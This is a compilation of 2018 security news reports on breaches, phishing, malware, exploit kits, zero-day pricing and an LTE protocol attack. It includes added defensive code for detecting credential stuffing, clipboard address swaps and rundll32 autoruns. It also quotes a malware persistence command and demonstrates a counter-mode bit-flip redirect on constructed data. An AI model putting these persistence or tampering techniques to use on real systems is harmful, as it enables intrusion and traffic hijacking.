The social platform also donated $8,000 (it apparently doubled the $4,000 bounty because the researcher chose to donate it to charity) to the Freedom of the Press Foundation.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher notes.


Two Arrested for Hacking 700,000 Accounts
2.7.2018 securityweek  Crime

Russian law enforcement this week said two individuals were arrested for compromising accounts of loyalty program members from popular websites.

The unnamed cybercriminals allegedly compromised around 700,000 accounts from companies such as PayPal, Ulmart, Biglion, KupiKupon, Groupon, and others. They are also said to have put 2,000 of these accounts up for sale for $5 each.

“The detainees admitted on the spot that they had earned at least 500,000 rubles. However, the real amount of damage remains to be determined,” Group-IB, which aided with the investigation, says.

The hackers’ activity first drew attention in November 2015, when the website of a large online store was hit by a large-scale cyber-attack in which the personal accounts of the store’s loyalty program members were compromised. The miscreants compromised around 120,000 accounts within a month.

The investigators discovered that the attackers “had collected compromised account information from various Internet services on hacker forums and used special programs to automatically guess passwords of accounts on the website of the online store.”

The miscreants relied on people’s habit of reusing the same login and password on multiple websites. Where credentials collected elsewhere were also in use on a targeted website, the hackers gained access to that personal account.

The cybercriminals would check the accumulated bonuses on each account and would sell them on hacker forums at $5 per account or 20-30% of the nominal balance of the accounts. The buyers could then abuse the accounts to pay for products with the bonuses.

The hackers, Group-IB says, weren’t only selling compromised accounts, but also offered services for hijacking accounts: they would change the phone number and e-mail on the accounts of the online store. Such services were offered at a price of 10% of the bonus balance on the account.

To hide their tracks, the attackers used anonymizers, launched the attacks from different IP addresses, and also changed the digital fingerprint of the browser (User-Agent). Overall, they sent authorization requests from more than 35,000 unique IP addresses.
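Detection logic for the pattern just described (many accounts tried from many IP addresses with rotated User-Agents, each source staying below a per-IP lockout), run over constructed log lines; this is example code added here, not Group-IB’s or the retailer’s tooling, and the log format and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "<iso-timestamp> <ip> <user> <result> <user-agent>".
# Ten accounts probed from ten IPs within a few seconds, then one ordinary user
# who mistypes a password and retries from a single IP.
SAMPLE_LOG = """\
2015-11-03T10:00:01 203.0.113.10 anna.k FAIL Mozilla/5.0 (Windows NT 6.1)
2015-11-03T10:00:02 203.0.113.11 boris.m FAIL Mozilla/5.0 (Windows NT 10.0)
2015-11-03T10:00:02 203.0.113.12 carla.p FAIL Mozilla/5.0 (X11; Linux x86_64)
2015-11-03T10:00:03 203.0.113.13 dmitri.v OK Mozilla/5.0 (Macintosh)
2015-11-03T10:00:04 203.0.113.14 elena.s FAIL Mozilla/5.0 (Windows NT 6.3)
2015-11-03T10:00:05 203.0.113.15 fedor.t FAIL Opera/9.80
2015-11-03T10:00:05 203.0.113.16 galina.r OK Mozilla/5.0 (iPhone)
2015-11-03T10:00:06 203.0.113.17 hanna.w FAIL Mozilla/5.0 (Android 5.0)
2015-11-03T10:00:07 203.0.113.18 igor.l FAIL Mozilla/5.0 (Windows NT 6.1)
2015-11-03T10:00:08 203.0.113.19 julia.n FAIL Mozilla/5.0 (Windows NT 10.0)
2015-11-03T10:30:00 198.51.100.7 karl.o FAIL Mozilla/5.0 (Windows NT 10.0)
2015-11-03T10:30:20 198.51.100.7 karl.o OK Mozilla/5.0 (Windows NT 10.0)
"""

WINDOW = timedelta(minutes=5)


def parse_log(text):
    """Split each line into a login event; the User-Agent is the free-text tail."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result, agent = line.split(maxsplit=4)
        events.append({"ts": datetime.fromisoformat(ts), "ip": ip, "user": user,
                       "ok": result == "OK", "agent": agent})
    return events


def window_start(ts, window=WINDOW):
    """Align a timestamp to the start of its fixed-size window."""
    epoch = datetime(1970, 1, 1)
    return epoch + ((ts - epoch) // window) * window


def per_ip_lockout_triggers(events, max_failures=5):
    """The classic defence: lock out an IP after N failed logins. Returns the IPs
    that would trip it. Distributed stuffing keeps every IP below the bar."""
    failures = defaultdict(int)
    for e in events:
        if not e["ok"]:
            failures[e["ip"]] += 1
    return sorted(ip for ip, n in failures.items() if n >= max_failures)


def detect_stuffing(events, min_users=8, min_ips=5, min_fail_ratio=0.6):
    """Look at the population per window rather than per source: many distinct
    accounts, many distinct IPs and a high failure ratio together indicate a
    credential-stuffing run. Successful logins inside such a window are the
    accounts whose reused passwords worked and should be reset."""
    by_window = defaultdict(list)
    for e in events:
        by_window[window_start(e["ts"])].append(e)
    alerts = []
    for start, evs in sorted(by_window.items()):
        users = {e["user"] for e in evs}
        ips = {e["ip"] for e in evs}
        failures = sum(1 for e in evs if not e["ok"])
        if len(users) >= min_users and len(ips) >= min_ips and failures / len(evs) >= min_fail_ratio:
            alerts.append({
                "window_start": start.isoformat(),
                "attempts": len(evs),
                "distinct_users": len(users),
                "distinct_ips": len(ips),
                "distinct_agents": len({e["agent"] for e in evs}),
                "failures": failures,
                "likely_compromised": sorted(e["user"] for e in evs if e["ok"]),
            })
    return alerts
```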

Large retailers started checking all orders paid with bonuses in early 2016, which led the hackers to target lesser-known online stores.

“In addition, the hackers began to work on tips—information about new online stores with bonus programs and coupon services where it was possible to access personal accounts, for which the attackers promised to pay up to 50% of the amount received from the further sale of the compromised accounts,” Group-IB reports.

The leader in these attacks was a resident of Ryazan Region, born in 1998. His partner, born in 1997, who provided technical support for their joint online store, resided in Astrakhan Region.

During a search, investigators seized evidence of the group’s unlawful activities, along with narcotics. The suspects have confessed to the crimes but the investigation is still ongoing.


Typeform Data Breach Hits Many Organizations
2.7.2018 securityweek  Incident

Typeform, a Spain-based software-as-a-service (SaaS) company that specializes in online forms and surveys, has suffered a security breach that resulted in the data collected by its customers getting stolen.

According to a notice posted on its website, Typeform identified the breach on June 27 and addressed its cause roughly half an hour later. The company says an attacker has managed to download a backup file dated May 3 from one of its servers.

The compromised file stored names, email addresses and other pieces of information submitted by users through Typeform forms. Data collected after May 3, payment information, and passwords are not impacted, Typeform said.

UK-based mobile banking service Monzo is one of the impacted organizations. Monzo says the breach affects roughly 20,000 individuals, the vast majority of whom only had their email address exposed. However, in some cases, information such as postcode, name of the old bank, Twitter username, university, city, age and salary range, and employer was also compromised. Monzo says it has ended its relationship with Typeform following the incident.

The Tasmanian Electoral Commission was also hit by this breach. The organization notes that while some of the stolen data is already public, the attacker may have also obtained names, addresses, email addresses, and dates of birth submitted by electors when applying for an express vote at recent elections.

The list of organizations that have notified customers of the Typeform breach also includes Thriva, Birdseye, HackUPC, and Ocean Protocol.

Typeform last year claimed to have 30,000 paying customers and many more using its free service. Companies such as Apple, Uber, Facebook, Adobe, Airbnb, WeTransfer and BBC are also said to have used its services at some point. The company’s website currently lists Trello, HubSpot, Indiegogo, Forbes, and Freshdesk as customers.

Typeform has assured customers that it has identified and addressed the source of the breach. The company claims it has initiated a comprehensive review of its system security and is taking “significant measures” to prevent such incidents from occurring in the future.

However, shortly after the data breach was disclosed, one Twitter user claimed to have identified another vulnerability in Typeform systems.


Vulnerabilities Patched in VMware ESXi, Workstation, Fusion
2.7.2018 securityweek  Vulnerability

VMware informed customers last week that it patched several vulnerabilities that can lead to a denial-of-service (DoS) condition or information disclosure in its ESXi, Workstation, and Fusion products.

VMware described the flaws as out-of-bounds read issues in the shader translator component. An attacker with regular user privileges can exploit the security holes to obtain information or crash virtual machines.

The vulnerabilities, classified as “important,” are tracked as CVE-2018-6965, CVE-2018-6966 and CVE-2018-6967. A Tencent ZhanluLab researcher who uses the online moniker “RanchoIce” has been credited for reporting the flaws to VMware. A researcher from Cisco Talos independently discovered CVE-2018-6965.

According to VMware, the flaws impact ESXi 6.7 and Workstation 14.x running on any platform, and Fusion 10.x running on OS X. Patches and updates have been released for each of the affected products.

Cisco Talos has published an advisory containing technical details for CVE-2018-6965. The company has assigned a CVSS score of 6.5 to this vulnerability, which puts it near the “high severity” range.

“A specially crafted pixel shader can cause a read access violation resulting in, at least, denial of service. An attacker can provide a specially crafted shader file (either in binary or text form) to trigger this vulnerability. This vulnerability can be triggered from VMware guest and VMware host, which will be affected (leading to vmware-vmx.exe process crash on host),” Talos wrote in its advisory.

“In short, it is possible to create a shader in such a way that it will cause invalid pointer calculation. The pointer is later used for read memory operations. This causes access violation due to the pointer being invalid, which results in a denial of service, but could potentially be turned into an information disclosure vulnerability,” Talos added.


Trezor users targeted by phishing attacks, experts blame DNS Poisoning or BGP Hijacking
2.7.2018 securityaffairs  Phishing

The maintainers of the Trezor multi-cryptocurrency wallet service reported a phishing attack against some of its users that occurred during the weekend.

TREZOR (@TREZOR), 1 Jul, replying to @TREZOR: “More details will be published soon in the form of a blog post.”

Carsten (@Carsten71071425), 1:13 PM - Jul 1, 2018: “I had some issues yesterday, when accessing your site. It seems to be related with DNS. Is http://beta-wallet.trezor.io legit?”

The attack appears more complex than a simple phishing campaign: the hackers may have carried out a DNS poisoning attack or a BGP hijacking to redirect users to a rogue phishing site that mimics the legitimate one.

“The signs point toward DNS poisoning or BGP hijacking,” explains the Trezor team.

Hackers redirected legitimate traffic for the official wallet.trezor.io domain to a rogue copy of the website.

The team launched an investigation to shed light on the attack. The incident was spotted after users reported HTTPS certificate errors when landing on the web wallet portal.

The error alerted users: a certificate error of this kind suggests they are visiting a rogue website that is attempting to pose as a legitimate one.

The users quickly reported the anomaly to the team of maintainers, who confirmed the phishing attack and published a security advisory to warn users.

“Late night yesterday, our Support Team started receiving inquiries about an invalid SSL certificate, which serves as a stamp of authenticity of our web services. This can happen for a few reasons, some of which are less serious. Unfortunately, after investigating these reports closer, we found out that the invalid certificate warning appeared because of phishing attempts against Trezor users.” reads the security advisory.

“The fake Trezor Wallet website was served to some users who attempted to access wallet.trezor.io — the legitimate address. We do not yet know which attack vector was used, but the signs point toward DNS poisoning or BGP hijacking.”

The company also pointed out two other tell-tale signs of the bogus website:

The first was an error message, different from the one on the original Trezor site, telling users that syncing data between their Trezor hardware wallet and their Trezor web account had failed.

The second was that the fake website asked users to provide a copy of their “recovery seed”. Trezor warns that users should never enter the recovery seed on a PC or in an app: if the attackers obtain the recovery seed, they can take over the accounts.

The company took down the malicious website with the support of the hosting provider.

slush (@slushcz), 5:43 PM - Jul 1, 2018: “At this moment, the fake Wallet has been taken down by the hosting provider. However, you should remain vigilant and report all suspicious sites. It is possible that this attack method will be used repeatedly in the future.” https://blog.trezor.io/psa-phishing-alert-fake-trezor-wallet-website-3bcfdfc3eced ([PSA] Phishing Alert: Fake Trezor Wallet website – TREZOR Blog)

At the time of writing, it is not clear whether the attackers stole any user funds.

Let’s close with suggestions provided by the company:

So how should I recognize the original Trezor Wallet?
Look for the “Secure” sign in your browser’s address bar. If the certificate is invalid, your browser will warn you, and you should heed the warning. (Make sure you are accessing the correct URL: wallet.trezor.io)
Always verify all operations on your Trezor device. You should only trust the device display and what is written on it. For other sources of information, always maintain a healthy amount of skepticism.
Thirdly, never divulge sensitive or private data to anyone. This includes us at SatoshiLabs. We will never ask you for your recovery seed. Wallet will never ask you for your recovery seed. Only your device may, but it will do so securely.


A sample of CryptoCurrency Clipboard Hijackers monitors 2.3 Million Bitcoin addresses
2.7.2018 securityaffairs Cryptocurrency

A sample of CryptoCurrency Clipboard Hijackers discovered this week by BleepingComputer monitors for more than 2.3 million addresses.
Almost anyone who sends cryptocurrency copies the recipient’s wallet address from one application and pastes it into another to make the transaction.

Crooks’ interest in cryptocurrency continues to grow, and new malware has been specifically designed to recognize wallet addresses in the memory of infected computers and abuse them for fraudulent activities, such as hijacking transactions.

This family of malware, called CryptoCurrency Clipboard Hijackers, monitors the Windows clipboard for cryptocurrency addresses and, if one is detected, replaces the address in the clipboard with the attacker’s own.

With this simple trick, when the user pastes the address, the coins are sent to the attacker instead.

In March, researchers at Palo Alto Networks discovered a malware dubbed ComboJack that is able to detect when users copy a cryptocurrency address and alter the clipboard to steal cryptocurrencies and payments. In June, experts from Qihoo 360 Total Security spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that infected over 300,000 computers; most of the victims were located in Asia, mainly China.

What is special about the sample of cryptocurrency clipboard hijackers recently discovered by researchers at BleepingComputer?

While most of the previous samples monitored for 400-600 thousand cryptocurrency addresses, the sample discovered this week by BleepingComputer monitors for more than 2.3 million cryptocurrency addresses.


The following video shows how CryptoCurrency Clipboard Hijackers replace cryptocurrency addresses found within the Windows clipboard.

The only way to prevent this kind of attack is to double-check the pasted address.
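Example code added here (not BleepingComputer’s) for the double-check the sentence above calls for: a Base58Check validator for Bitcoin addresses, and why checksum validation alone cannot catch a swap, since the hijacker’s substitute address is itself well formed. The addresses are constructed from made-up hashes.

```python
import hashlib

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def _sha256d(data):
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def base58check_encode(payload):
    """payload = version byte + 20-byte hash; a 4-byte double-SHA256 checksum is
    appended and the whole 25 bytes are written as a big base-58 number."""
    data = payload + _sha256d(payload)[:4]
    n = int.from_bytes(data, "big")
    digits = ""
    while n:
        n, rem = divmod(n, 58)
        digits = B58[rem] + digits
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + digits  # each leading zero byte encodes as '1'


def base58check_decode(addr):
    """Return the 21-byte payload, or raise ValueError if the string is not a
    well-formed Base58Check address (bad alphabet, length or checksum)."""
    n = 0
    for ch in addr:
        idx = B58.find(ch)
        if idx < 0:
            raise ValueError("character %r not in Base58 alphabet" % ch)
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    leading_ones = len(addr) - len(addr.lstrip("1"))
    data = b"\x00" * leading_ones + body
    if len(data) != 25:
        raise ValueError("decoded length %d, expected 25" % len(data))
    payload, checksum = data[:21], data[21:]
    if _sha256d(payload)[:4] != checksum:
        raise ValueError("checksum mismatch")
    return payload


def is_valid_address(addr):
    """Mainnet P2PKH (version 0x00) or P2SH (version 0x05) with a good checksum."""
    try:
        return base58check_decode(addr)[0] in (0x00, 0x05)
    except ValueError:
        return False


def verify_paste(copied, pasted):
    """The check to run before sending: 'ok', 'invalid' (malformed), or 'swapped'
    (well formed but not the address that was copied). A clipboard hijacker
    substitutes a valid address of its own, so only the comparison against what
    the user copied, not the checksum, reveals the swap."""
    if not is_valid_address(pasted):
        return "invalid"
    return "ok" if pasted == copied else "swapped"


def constructed_address(label):
    """Build a valid P2PKH address from a made-up 20-byte hash (stand-in for the
    HASH160 of a public key); for the demonstration only."""
    fake_hash160 = hashlib.sha256(label).digest()[:20]
    return base58check_encode(b"\x00" + fake_hash160)
```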

The infection was associated with a recent campaign that targeted Windows computers with the so-called All-Radio 4.27 Portable malware package.


“If your computer is suddenly displaying the above program, then your computer is infected with malware that installs rootkits, miners, information-stealing Trojans, and a program that is using your computer to send out spam.” reads a post published by BleepingComputer.

Once the malicious code is installed, a DLL named d3dx11_31.dll is downloaded to the Windows Temp folder and an autorun called “DirectX 11” is created to run the library every time a user logs into the computer.

“This DLL will be executed using rundll32.exe with the “rundll32 C:\Users\[user-name]\AppData\Local\Temp\d3dx11_31.dll,includes_func_runnded” command.”
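A detection check for the persistence mechanism just quoted, as example code added here (not BleepingComputer’s): it parses rundll32 autorun commands and flags DLLs loaded from user-writable locations such as the Temp folder. The registry entries are constructed; only the DLL and export names come from the article.

```python
import re

# Constructed autorun entries as (value name, command) pairs, as they might be
# exported from HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The
# "DirectX 11" entry reproduces the command quoted above; the others are made up.
CONSTRUCTED_RUN_ENTRIES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("DirectX 11", r"rundll32 C:\Users\alice\AppData\Local\Temp\d3dx11_31.dll,includes_func_runnded"),
    ("VendorHelper", r"rundll32.exe C:\Windows\System32\constructed_vendor.dll,Init"),
]

# Directories an unprivileged user can write to: a DLL loaded from here by an
# autorun is a classic persistence indicator.
USER_WRITABLE_MARKERS = ("\\appdata\\local\\temp\\", "\\appdata\\local\\",
                         "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")

# Matches 'rundll32', 'rundll32.exe' or a quoted/unquoted full path to it,
# capturing everything after the executable.
RUNDLL32 = re.compile(r'^"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(.+)$', re.IGNORECASE)


def parse_rundll32(command):
    """Return (dll_path, entry_point) for a rundll32 command, else None.
    rundll32 syntax is '<dll>,<entrypoint> [args]'; the DLL path may be quoted."""
    m = RUNDLL32.match(command.strip())
    if not m:
        return None
    rest = m.group(1).strip()
    if rest.startswith('"'):
        end = rest.find('"', 1)
        if end < 0:
            return None
        dll, tail = rest[1:end], rest[end + 1:].strip()
        entry = tail[1:].split()[0] if tail.startswith(",") and len(tail) > 1 else ""
    else:
        dll, _, entry = rest.split()[0].partition(",")
    return dll, entry


def suspicious_autoruns(entries):
    """Flag autorun values that use rundll32 to load a DLL from a location a
    normal user can write to, or from anywhere outside the Windows and Program
    Files trees. Returns one finding per flagged entry, with the reasons."""
    findings = []
    for name, command in entries:
        parsed = parse_rundll32(command)
        if parsed is None:
            continue
        dll, entry = parsed
        low = dll.lower()
        reasons = []
        if any(marker in low for marker in USER_WRITABLE_MARKERS):
            reasons.append("DLL in user-writable directory")
        if not low.startswith(TRUSTED_PREFIXES):
            reasons.append("DLL outside Windows/Program Files")
        if reasons:
            findings.append({"name": name, "dll": dll, "entry_point": entry, "reasons": reasons})
    return findings
```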

As usual, let me suggest using an up-to-date antivirus solution to detect and neutralize these threats.


RIG Exploit Kit operators leverage PROPagate Injection Technique to deliver Miner
2.7.2018 securityaffairs  Exploit

FireEye reported the PROPagate code injection technique that was observed for the first time in a malware distribution campaign in the wild.
Security experts from FireEye have documented the PROPagate code injection technique that was observed for the first time in a malware distribution campaign in the wild.

The PROPagate code injection technique was first discovered in November 2017 by a researcher at Hexacorn, who demonstrated that it works on all recent Windows versions and could allow attackers to inject malicious code into other applications.

The researcher found that it is possible to abuse legitimate GUI window properties (UxSubclassInfo and CC32SubclassInfo), used internally by the SetWindowSubclass function of the Windows API that manages GUIs, to load and execute malicious code inside the processes of legitimate applications.

Malware authors took several months to adopt the PROPagate code injection technique in a live malware campaign.

Recently the experts at FireEye uncovered a campaign leveraging the RIG Exploit Kit to deliver a Monero miner via the PROPagate code injection technique.

The operators of the RIG exploit kit hijack traffic from legitimate sites using a hidden iframe and redirect it to a page hosting the exploit kit. The RIG exploit kit uses three JavaScript snippets, each of which uses a different technique to deliver the malicious payload. The three techniques spread the malware:

via malicious JavaScript;
via Flash;
via Visual Basic script.

Below is the attack chain as described by FireEye:

“The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe.” reads the analysis published by FireEye.

“This shellcode executes the next payload, which downloads and executes the Monero miner.”


The analysis of the payload allowed the experts to determine that the threat actors used multiple payloads and anti-analysis techniques to evade analysis environments.


“Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products,” concluded FireEye.


Zerodium offers up to $500,000 for Linux Zero-Day exploits
1.7.2018 securityaffairs  Exploit

The sale of zero-day exploits is a prolific business: zero-day broker Zerodium offers rewards of up to $500,000 for FreeBSD, OpenBSD, NetBSD and Linux zero-days.
The sale of zero-day exploits is a prolific business that most people are unaware of. To better understand its evolution, let’s look at the offer of the popular exploit broker Zerodium, starting with how the company describes its mission on its website.

“ZERODIUM pays premium bounties and rewards to security researchers to acquire their original and previously unreported zero-day research affecting major operating systems, software, and devices.” reads the company website. “While the majority of existing bug bounty programs accept almost any kind of vulnerabilities and PoCs but pay very low rewards, at ZERODIUM we focus on high-risk vulnerabilities with fully functional exploits, and we pay the highest rewards on the market.”

Zerodium, like other zero-day brokers, buys zero-days and sells them to government agencies and law enforcement, but many privacy advocates fear that these flaws could end up with surveillance firms that sell their products to authoritarian regimes.

The company is offering rewards of up to $500,000 for zero-day exploits in UNIX-based operating systems, including OpenBSD, FreeBSD and NetBSD. The same offer applies to exploits for popular Linux distros such as Ubuntu, CentOS, Debian, and Tails.

Prices for zero-days vary based on several factors, including the market share of the affected platforms (Windows zero-day exploits are usually more valuable than Linux ones) and the level of user interaction required to exploit the flaw (no click, one click, two clicks, etc.).

Other factors include the reliability of the zero-day exploit, the number of vulnerabilities that must be chained to exploit the flaw, the success rate, and the OS configuration required for exploitation.

The rewards for Linux zero-days continue to increase, a trend observed since February, when rewards went as high as $45,000.

Zerodium (@Zerodium), 6:17 PM - Jun 27, 2018: “We're currently acquiring #0day exploits (privilege escalation or RCE) for the following operating systems: OpenBSD, FreeBSD, NetBSD, Ubuntu, CentOS, Debian, and Tails. For related inquiries or submissions, contact us: https://zerodium.com/submit.html”

The company shared the latest zero-day acquisition drive as part of its ordinary zero-day acquisition program.

The acquisition drive includes special offers, usually associated with higher fees, for specific zero-day exploits.

Zerodium is still looking for remote code execution or local privilege escalation exploits for Linux and BSD systems, offering variable rewards that can go up to $500,000.

The firm’s payouts for Linux privilege escalation zero-day exploits range from $10,000 to $30,000, while a local privilege escalation (LPE) in Linux could be paid up to $100,000.

Rewards for Linux remote code execution exploits can range from $50,000 to $500,000, with zero-days for CentOS and Ubuntu the most wanted.

Over the months, Zerodium has published several acquisition drives seeking zero-day exploits targeting iOS, Adobe Flash Player, the Tor Browser, mobile IM apps, and Android.


In the past Zerodium offered up to $1.5 million for an iOS zero-day exploit.

Looking at the price list for zero-days, we can see that exploits for server environments such as Linux command high rewards, but mobile exploits remain the most expensive on the zero-day market.

Recently a new player, Crowdfense, emerged on the zero-day market, launching an acquisition program with $10 million in prizes.


Security issues in the LTE standard expose billions of mobile users to attacks
1.7.2018 securityaffairs Attack

Security issues in the LTE mobile device standard could be exploited by persistent attackers to spy on users’ cellular networks and hijack data traffic.
A team of researchers from Ruhr-Universität Bochum and New York University Abu Dhabi has discovered security issues in the LTE mobile device standard that could be exploited by persistent attackers (i.e. intelligence agencies or well-funded groups) to spy on users’ cellular networks, eavesdrop on communications and hijack their data traffic.

The LTE mobile telephony standard is currently used by billions of people worldwide and, compared to earlier standards, includes many security improvements.

The experts devised surveillance techniques that allowed them to identify people within a phone tower radio cell, spy on their traffic, and redirect them to rogue websites by tampering with DNS lookups.

The researchers demonstrated three attack scenarios that target the data link layer of Long-Term Evolution networks, also known as LTE or 4G.

“Our security analysis of the mobile communication standard LTE (Long-Term Evolution, also known as 4G) on the data link layer (so-called layer two) has uncovered three novel attack vectors that enable different attacks against the protocol.” reads the analysis published by the experts.

“On the one hand, we introduce two passive attacks that demonstrate an identity mapping attack and a method to perform website fingerprinting. On the other hand, we present an active cryptographic attack called aLTEr attack that allows an attacker to redirect network connections by performing DNS spoofing due to a specification flaw in the LTE standard.”

The data link layer lies on top of the physical channel, which carries the wireless transmission of information between the users and the network. Layer two defines how multiple users share the network's resources, helps correct transmission errors, and implements data protection through encryption.

The researchers distinguish between passive and active attack techniques: the former include the identification and website snooping techniques, the latter is the webpage redirection attack.

The identification and website snooping techniques could allow attackers to spy on users by listening to what goes out over the airwaves from their phones, whereas the webpage redirection attack is conducted by an attacker who sets up a malicious cell tower to tamper with transmissions.

The experts dubbed the DNS spoofing attack “aLTEr” and describe it as follows:

“The aLTEr attack exploits the fact that LTE user data is encrypted in counter mode (AES-CTR) but not integrity protected, which allows us to modify the message payload: the encryption algorithm is malleable, and an adversary can modify a ciphertext into another ciphertext which later decrypts to a related plaintext,” reads the research paper published by the experts.

“the adversary sends signals to the network or to the device by using a specific device that is capable of simulating the legitimate network or user device. In our case, the adversary does both and intercepts all transmissions between Bob and the network. Thus, Bob perceives the adversary as his usual network provider and connects to the simulation device. Towards the real network, the adversary acts like she was Bob.”


The experts conducted the attacks in a controlled environment and highlighted that the requirements are, at the moment, hard to meet in real LTE networks; nevertheless, persistent attackers could replicate them in the wild.

The researchers used a shielding box to stabilize the radio layer and prevent interference during the tests.

The team set up two servers, a DNS server and an HTTP server, to show how an attacker can hijack connections (see the PoC attack video).

The experts published a paper with all the technical details of the aLTEr attack and a video PoC of the attack:

The attack also requires software-defined radio equipment (a USRP), which costs about $4,000, to emulate the behavior of spying boxes such as IMSI catchers or Stingrays.

The researchers also described countermeasures that would mitigate the attacks. They have already shared the findings of their study with telco institutions, including the GSM Association (GSMA) and the 3rd Generation Partnership Project (3GPP), and with telephone companies.

According to the experts, forthcoming 5G networks may also be vulnerable to these attack techniques, even though the 5G standard supports authenticated encryption.

“The use of authenticated encryption would prevent the aLTEr attack, which can be achieved through the addition of message authentication codes to user plane packets,” the experts said.

“However, the current 5G specification does not require this security feature as mandatory, but leaves it as an optional configuration parameter.”
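To show concretely why the missing integrity protection matters (the malleability quoted above) and why the authenticated encryption the experts recommend closes the gap, here is an added example; it is not code from the paper or from this article. It assumes a SHA-256-based counter-mode keystream standing in for AES-CTR (the malleability property depends only on ciphertext being plaintext XOR keystream) and a constructed user-plane packet with placeholder addresses.

```python
import hashlib
import hmac
import os


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: block i = SHA-256(key || nonce || i).
    Assumption: this stands in for AES-CTR; only the XOR structure matters here."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def ctr_encrypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt (or decrypt: XOR is its own inverse) in counter mode."""
    return bytes(d ^ k for d, k in zip(data, keystream(key, nonce, len(data))))


def flip_plaintext_bytes(ciphertext: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """The malleability relation the paper describes: without knowing the key,
    XORing (old XOR new) into the ciphertext makes it decrypt to the plaintext
    with `old` replaced by `new` at `offset`."""
    if len(old) != len(new):
        raise ValueError("old and new must have equal length")
    ct = bytearray(ciphertext)
    for i, (o, n) in enumerate(zip(old, new)):
        ct[offset + i] ^= o ^ n
    return bytes(ct)


def mac_tag(mac_key: bytes, nonce: bytes, ciphertext: bytes) -> bytes:
    """Message authentication code over nonce and ciphertext (encrypt-then-MAC)."""
    return hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()


def ae_encrypt(enc_key: bytes, mac_key: bytes, nonce: bytes, data: bytes):
    """Authenticated encryption: ciphertext plus a tag the receiver must verify."""
    ct = ctr_encrypt(enc_key, nonce, data)
    return ct, mac_tag(mac_key, nonce, ct)


def ae_decrypt(enc_key, mac_key, nonce, ciphertext, tag):
    """Authenticated decryption: returns None (packet dropped) if the tag does not verify."""
    if not hmac.compare_digest(mac_tag(mac_key, nonce, ciphertext), tag):
        return None
    return ctr_encrypt(enc_key, nonce, ciphertext)


def demo() -> dict:
    enc_key, mac_key, nonce = os.urandom(16), os.urandom(16), os.urandom(8)
    # Constructed "user-plane packet": destination address followed by a DNS query.
    resolver_ip = b"\x0a\x00\x00\x35"  # constructed: 10.0.0.53, the phone's legitimate resolver
    rogue_ip = b"\xc0\x00\x02\x01"     # constructed: 192.0.2.1, a documentation-range address
    packet = b"DST=" + resolver_ip + b"|QUERY=example.com"
    offset = len(b"DST=")

    # LTE user plane as specified: encryption only. A bit flip in transit goes unnoticed.
    ct = ctr_encrypt(enc_key, nonce, packet)
    redirected = ctr_encrypt(enc_key, nonce, flip_plaintext_bytes(ct, offset, resolver_ip, rogue_ip))

    # With a MAC (the countermeasure the experts recommend): the same flip is rejected.
    ct2, tag = ae_encrypt(enc_key, mac_key, nonce, packet)
    tampered = flip_plaintext_bytes(ct2, offset, resolver_ip, rogue_ip)

    return {
        "ctr_only_redirected": redirected == b"DST=" + rogue_ip + b"|QUERY=example.com",
        "mac_rejects_tampering": ae_decrypt(enc_key, mac_key, nonce, tampered, tag) is None,
        "mac_accepts_genuine": ae_decrypt(enc_key, mac_key, nonce, ct2, tag) == packet,
    }


if __name__ == "__main__":
    print(demo())
```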

The researchers will share full details about their research during the 2019 IEEE Symposium on Security and Privacy.


Data Broker Exactis data breach, one of the biggest ever, exposes millions of Americans
1.7.2018 securityaffairs Incident

Security expert Vinny Troia has found a huge trove of data belonging to millions of Americans that was left unsecured online.
Troia was analyzing the security of Elasticsearch installs exposed online when he discovered millions of records belonging to Americans that were left unsecured.

The expert used Shodan to find U.S. Elasticsearch databases exposed on the internet; the query returned around 7,000 instances. One of them immediately appeared very interesting: an archive owned by the US data broker firm Exactis that contained personal data on both consumers and businesses.

“Earlier this month, security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server. The haul comprises close to 2 terabytes of data that appears to include personal information on hundreds of millions of American adults, as well as millions of businesses.” reported Wired.

“While the precise number of individuals included in the data isn’t clear—and the leak doesn’t seem to contain credit card information or Social Security numbers—it does go into minute detail for each individual listed, including phone numbers, home addresses, email addresses, and other highly personal characteristics for every name.”

The archive contained roughly 340 million records (230 million on consumers and 110 million on business contacts); this is probably the biggest potential breach ever seen.

According to the Exactis website, the firm has gathered consumer data on 218 million individuals and 110 million households.

The archive contains 88 million records that include email addresses and postal addresses, while 112 million records include residential phone numbers.

Business data includes 21 million records of companies, 40 million postal addresses, 21 million records with email addresses and postal address, and 52 million business phone numbers.

The good news is that the archive did not include credit card information or Social Security numbers.


At this time it is not clear to what extent the archive was exposed, but experts believe it was completely exposed online. The archive includes interests, habits, the age and gender of children, and more than 400 variables ranging from religion and pets to whether a person smokes.

